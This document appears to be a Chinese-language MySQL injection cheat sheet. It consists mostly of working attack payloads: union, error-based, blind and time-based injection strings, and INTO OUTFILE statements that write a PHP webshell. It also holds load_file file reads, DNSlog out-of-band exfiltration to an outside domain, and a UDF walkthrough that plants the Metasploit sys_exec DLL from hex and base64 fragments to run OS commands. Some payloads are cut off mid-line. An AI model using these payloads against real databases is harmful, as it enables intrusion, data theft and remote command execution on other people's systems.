MYSQL注入
函数
version()——MySQL 版本
user()——数据库用户名
database()——数据库名
@@datadir——数据库路径
@@version_compile_os——操作系统版本
information_schema 自带数据库
information_schema.schemata 数据库
information_schema.tables 数据表
information_schema.columns 数据列
floor函数返回小于等于该值的最大整数
RAND()函数调用可以在0和1之间产生一个随机数
join(连接)
联合注入
union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
报错注入:
rand()
floor()
and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a) and (select count(*) from information_schema.tables group by concat(user(),floor(rand(0)*2))) -- + 1' and updatexml(1,user(),1) --+ 只有在payload返回的不是xml格式才会生效,其最长输出32位 extractvalue(1,concat('~',user(),'~')) 其最长输出32位
简化
select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))
关键表被禁用
select count(*) from (select 1 union select null union select !1)a group by concat(version(),floor(rand(0)*2))
rand 禁用
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
exp
select exp(~(select * FROM(SELECT USER())a))
mysql重复性
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
布尔注入
left(database(),1)>'s' 截取数据库第一位 ascii(substr((select table_name information_schema.tables where tables_schema =database()limit 0,1),1,1))=101 --+ substr(a,b,c) 从b位置开始,截取字符串a的c长度 ascii() 将某个字符转为ascii值 ascii(substr(select database()),1,1)=98 ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23 mid(a,b,c) 从位置b开始,街区a字符床的c位 ord()同ascii(),将字符串转为ascii值
regexp 正则注入
select user() regexp '^[a-z]'; select user() regexp '^ro' I select * from users where id=1 and 1=(if((user() regexp '^r'),1,0)); select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);
like 匹配注入
select user() like 'root%'
延时注入
If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;
导入导出操作
load_file()导出文件 Select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92, 114,101,112,97,105,114,92,115,97,109))) -1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105)) Explain:“char(99,58,47,98,111,111,116,46,105,110,105)”就是“c:/boot.ini”的 ASCII 代码 -1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69) Explain:“c:/boot.ini”的 16 进制是“0x633a2f626f6f742e696e69” -1 union select 1,1,1,load_file(c:\boot.ini) Explain:路径里的/用 \代替
Mysql False注入
==遇到引号闭合的变量时==
如果两个参数比较,有至少一个NULL,结果就是NULL,除了是用NULL<=>NULL 会返回1。不做类型转换 --------------------------------------------- 两个参数都是字符串,按照字符串比较。不做类型转换 --------------------------------------------- 两个参数都是整数,按照整数比较。不做类型转换 --------------------------------------------- 如果不与数字进行比较,则将十六进制值视为二进制字符串。 --------------------------------------------- 有一个参数是 TIMESTAMP 或 DATETIME,并且另外一个参数是常量,常量会被转换为时间戳 --------------------------------------------- 有一个参数是 decimal 类型,如果另外一个参数是 decimal 或者整数,会将整数转换为 decimal 后进行比较,如果另外一个参数是浮点数,则会把 decimal 转换为浮点数进行比较 --------------------------------------------- 所有其他情况下,两个参数都会被转换为浮点数再进行比较 --------------------------------------------- 最后那一句话很重要,说明如果我是字符串和数字比较,需要将字符串转为浮点数,这很明显会转换失败
算数运算
- +
username= 'admin'+(payload)
– –
username ='admin'--(payload)
– *
username ='1abc'* (payload)
- /
username ='1abc'/ (payload) 1’-(ascii(mid((passwd)from(n)))=m)-’ 正常的用法如下,对于str字符串,从pos作为索引值位置开始,返回截取len长度的子字符串 MID(str,pos,len) 这里的用法是,from(1)表示从第一个位置开始截取剩下的字符串,for(1)表示从改位置起一次就截取一个字符 mid((str)from(i)) mid((str)from(i)for(1))
位运算
- &
username='1abc'&(payload)
- | 或
- ^ 异或
- ‘<>0# 移位操作
###逻辑运算
– 不等于
username='admin'<>(payload)
- = 等于
username='admin'=(payload)
其他
'+1 is not null# 'in(-1,1)# 'not in(1,0)# 'like 1# 'REGEXP 1# 'BETWEEN 1 AND 1# 'div 1# 'xor 1# '=round(0,1)='1 '<>ifnull(1,2)='1
Mysql 无列名注入
select * from users
select 1,2,3 union select * from users;
select `2` from (select 1,2,3 union select * from users)redforce;
select * from users where id=-1 union select 1,(select concat(`2`,0x3a,`3`) from (select 1,2,3 union select * from users)a limit 1,1),3;
查询几个字段数目
select * from (select 1)a,(select 2)b,(select 3 )c union select * from users
Mysql order by 注入
union 注入
select * from users
select * from users union select 1,2,3 order by 3
select * from users union select 1,2,'admin' order by 3
select * from users union select 1,2,'adminaa' order by 3
if盲注
- 需要知道列名
order by if(1=1,id,username)
- 不需要知道列名
order by if(表达式,1,(select id from information_schema.tables))
==如果表达式为false时,sql语句会报ERROR 1242 (21000): Subquery returns more than 1 row的错误,导致查询内容为空,如果表达式为true是,则会返回正常的页面。==
基于时间的盲注
order by if(1=1,1,sleep(1))
基于rand()的盲注
select * from ha order by rand(true)
mysql> select * from ha order by rand(true);
+—-+——+
| id | name |
+—-+——+
| 9 | NULL |
| 6 | NULL |
| 5 | NULL |
| 1 | dss |
| 0 | dasd |
+—-+——+
mysql> select * from ha order by rand(false);
+—-+——+
| id | name |
+—-+——+
| 1 | dss |
| 6 | NULL |
| 0 | dasd |
| 5 | NULL |
| 9 | NULL |
+—-+——+
order by rand(ascii(mid((select database()),1,1))>96)
步骤
- 判断
http://192.168.239.2:81/?order=IF(1=1,name,price) 通过name字段排序 http://192.168.239.2:81/?order=IF(1=2,name,price) 通过price字段排序 /?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通过name字段排序 /?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通过price字段排序 http://192.168.239.2:81/?order=IFNULL(NULL,price) 通过name字段排序 http://192.168.239.2:81/?order=IFNULL(NULL,name) 通过price字段排序 可以观测到排序的结果不一样 http://192.168.239.2:81/?order=rand(1=1) http://192.168.239.2:81/?order=rand(1=2) /?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00)) 正确 /?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x66,1,0x00)) 错误
regexp 用前面的1和后面的返回结果比较
cnblogs.com/icez/p/Mysq
limit 注入
不存在order by 关键字
select id from users limit 0,1
select id from users limit 0,1 union select username from users;
存在 order by 关键字(无法使用union select)
此方法适用于5.0.0< MySQL <5.6.6版本
PROCEDURE函数
- 报错注入
select id from users order by id desc limit 0,1 procedure analyse(extractvalue(r
- 延时注入
select * from admin where id >0 order by id limit 0,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(1=1,benchmark(2000000,md5(404)),1)))),1);
报错注入邂逅load_file&into outfile搭讪LINES
FIELDS TERMINATED BY原理为在输出数据的每个字段之间插入webshell内容,所以如果select返回的只有一个字段,则写入的文件不包含webshell内容,例如下面语句SELECT username FROM user WHERE id = 1 into outfile 'D:/1.php' FIELDS TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e,写入的文件中只包含username的值而没有webshell内容; LINES TERMINATED BY和LINES STARTING BY原理为在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以写入webshell内容,更为通用。此外,该类方式可以引用于limit等不能union的语句之后进行写文件操作。
into outfile 写文件
- union写文件
SELECT * FROM user WHERE id = -1 union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile 'D:/1.php'
- FIELDS TERMINATED BY(可在limit等语句后)
SELECT * FROM user WHERE id = 1 into outfile 'D:/1.php' fields terminated by 0x3c3f70687020706870696e666f28293b3f3e
- LINES TERMINATED BY(可用于limit等sql注入)
SELECT username FROM user WHERE id = 1 into outfile 'D:/1.php' LINES TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e
- LINES STARTING BY(可用于limit等sql注入)
SELECT username FROM user WHERE id = 1 into outfile 'D:/2.php' LINES STARTING BY 0x3c3f70687020706870696e666f28293b3f3e
###Load_file 读文件
- 联合注入+load_file读文件
SELECT * FROM user WHERE id=-1 UNION select 1,'1',(select load_file('D:/1.php'))
- DNSLOG带外查询
SELECT id FROM user WHERE id = load_file (concat('\\',hex((select load_file('D:/1.php'))),'.t00ls.xxxxxxxxx.tu4.org\a.txt'))
- 报错注入+load_file读文件
select * from user where username = '' and updatexml(0,concat(0x7e,(LOAD_FILE('D:/1.php')),0x7e),0) select * from user where id=1 and (extractvalue(1,concat(0x7e,(select (LOAD_FILE('D:/1.php'))),0x7e)))
扫描文件是否存在
load_file读取文件时,如果没有对应的权限获取或者文件不存在则函数返回NULL,所以结合isnull+load_file可以扫描判断文件名是否存在
- 如果文件存在,isnull(load_file(‘文件名’))返回0
mysql> select * from user where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/1.php')),0x7e),0); ERROR 1105 (HY000): XPATH syntax error: '~0~'
- 如果文件不存在isnull(load_file(‘文件名’))返回1
mysql> select * from user where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/xxxxx')),0x7e),0); ERROR 1105 (HY000): XPATH syntax error: '~1~'
另类写文件
SELECT ... INTO DUMPFILE'file_path'
笛卡尔积延时注入
SELECT count(*) FROM information_schema.columns A;
SELECT count(*) FROM information_schema.columns A,information_schema.columns B,information_schema.columns C;
Insert、update注入新思路
– 字符串《==》数字
conv() 进制转换
- 获取的数据超过8个字节
select conv(hex(substr(user(),1 + (n-1) * 8, 8 * n)), 16, 10);
- 获取表名
select conv(hex(substr((select table_name from information_schema.tables where table_
- 获取列名
select conv(hex(substr((select column_name from information_schema.columns where table_name=’Name of your table’ limit 0,1),1 + (n-1) * 8, 8*n)), 16, 10);
- 利用update语句
update users set username = 'test' | conv(hex(substr(user(),1 + (n-1) * 8, 8 * n)), 16, 10) where id =16
- 利用 INSERT语句
insert into users values (17,'james', 'bond'); insert into users values (17,'james', 'bond'|conv(hex(substr(user(),1 + (n-1) * 8, 8* n)),16, 10);
- Mysql 5.7中的限制
update users set username = '0' | conv(hex(substr(user(),1 + (n-1) * 8, 8 * n)), 16, 10) where id =16
- 编码解码
conv(hex(value, 16, 10) select unhex(conv(value, 10, 16));
mysql大整数溢出报错
- 获取表名
!(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)-~0
- 获取列名
select !(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x)-~0;
- 检索数据
!(select*from(select concat_ws(':',id, username, password) from users limit 0,1)x)-~0;
- 一次获取全部表与列
!(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0 (select(!x-~0)from(select(concat (@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a) (select!x-~0.from(select(concat (@:=0,(select count(*)from`information_schem
BIGINT Overflow Error Based SQL Injection
MD5哈希注入
- 代码中语句
$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";
如果可选的 raw_output 被设置为 TRUE,那么 MD5 报文摘要将以16字节长度的原始二进制格式返回。
ffifdyop --> 'or' esvh --> '=' 129581926211651571912466741651878684928 --> 'or'
bbs.ichunqiu.com/articl
show columns 注入
- php代码
mysql_query("show columns from `shop_{$table}`") or die("show coulumns 出错:".mysql_error()); show columns
- 注入
table=123` where updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#
MySQL数据库的Innodb引擎的注入
当目标程序过滤了关键字,如information,在注入时,使用select database()关键字查询出当前库名后,无法通过查询information_schema.tables表查询当前库的表名
- Innodb 的表
mysql.innodb_table_stats mysql.innodb_index_stats
- 字段
database_name , table_name
- 例子:
group_concat(table_name) from mysql.innodb_table_stats where database_name =database() #
Mysql约束攻击
- 参考
goodwaf.com/2016/12/30/
- 条件限制
服务端没有对用户名长度进行限制 登陆验证的SQL语句必须是用户名和密码一起验证 验证成功后返回的必须是用户传递进来的用户名,而不是从数据库取出的用户名
- 攻击原理
INSERT截断:当设计一个字段时,我们都必须对其设定一个最大长度,比如CHAR(10),VARCHAR(20)等等。但是当实际插入数据的长度超过限制时,数据库就会将其进行截断,只保留限定的长度。 在数据库对字符串进行比较时,如果两个字符串的长度不一样,则会将较短的字符串末尾填充空格,使两个字符串的长度一致,比如,字符串A:[String]和字符串B:[String2]进行比较时,由于String2比String多了一个字符串,这时MySQL会将字符串A填充为[String ],即在原来字符串后面加了一个空格,使两个字符串长度一致。
- 服务端代码
0){ return $username;//此处较原文有改动 } } return Null; ?>
- 攻击
注册一个[Dumb done]的用户
MySQL列名重复 报错
- Example
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
- join函数爆列名
select * from(select * from users a join users b)c;
select * from(select * from users a join users b using(id))c;
- 爆数据
select * from (select * from users a join users b using(id,username,password))c;
- 关于 join参考
wxb.github.io/2016/12/1
MySQL UDF Exploitation
MySQL UDF Exploitation
select host, user, password from mysql.user;
select * from mysql.user where user = substring_index(user(), '@', 1) ;
- dll下载地址
https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql
- 获取当前操作系统以及数据库架构情况
select @@version_compile_os, @@version_compile_machine show variables like '%compile%';
- 查找plugin文件夹
MySQL 5.0.67以后udf.dll必须位于plugin文件夹
select @@plugin_dir ; show variables like 'plugin%';
- 旧版本可以使用目录
@@datadir @@basedirbin C:windows C:windowssystem C:windowssystem32
上传二进制文件
- 网络共享
select load_file('\\192.168.0.19\network\lib_mysqludf_sys_64.dll') into dumpfile "D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\udf.dll";
- 十六进制编码
select hex(load_file('/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll')) into dumpfile '/tmp/udf.hex'; select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000… into dump file "D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\udf.dll";
- 创建表拼接
create table temp(data longblob); insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000); update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000); select data from temp into dump file "D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\udf.dll";
- MySQL 5.6.1/MariaDB 10.0.5
to_base64和from_base64函数
select to_base64(load_file('/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll')) into dumpfile '/tmp/udf.b64';
编辑base64文件并通过以下方式将其dump到插件目录
select from_base64("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAAzwu3gd6ODs3ejg7N3o4OzafEQs3Wjg7Np8QCzfaODs2nxB7N1o4OzUGX4 s3Sjg7N3o4KzW6ODs2nxCrN2o4OzafEWs3Wjg7Np8RGzdqODs2nxErN2o4OzUmljaHejg7MAAAAA AAAAAAAAAAAAAAAAUEUAAGSGBgBwsYNLAAAAAAAAAADwACIgCwIJAAASAAAAFgAAAAAAADQaAAAA EAAAAAAAgAEAAAAAEAAAAAIAAAUAAgAAAAAABQACAAAAAAAAgAAAAAQAADPOAAACAEABAAAQAAAA AAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAA5AAAFAgAAQDQAADwAAAAAYAAAsAIA AABQAABoAQAAAAAAAAAAAAAAcAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAwAABwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAR EAAAABAAAAASAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAABQsAAAAwAAAADAAAABYAAAAA") into dumpfile "D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\udf.dll";
DLL使用
- 查找到mysql的目录
select @@basedir;
- 创建文件夹(没测试成功)
select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录 select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS创建plugin目录
- 改变plugin目录位置
mysqld.exe –plugin-dir=C:\temp\plugins\
- 上传dll
- 安装
create function sys_exec returns int soname 'udf.dll';
- 验证
select * from mysql.func where name = 'sys_exec';
- 删除
drop function sys_exec;
- 执行
select sys_exec('cmd');
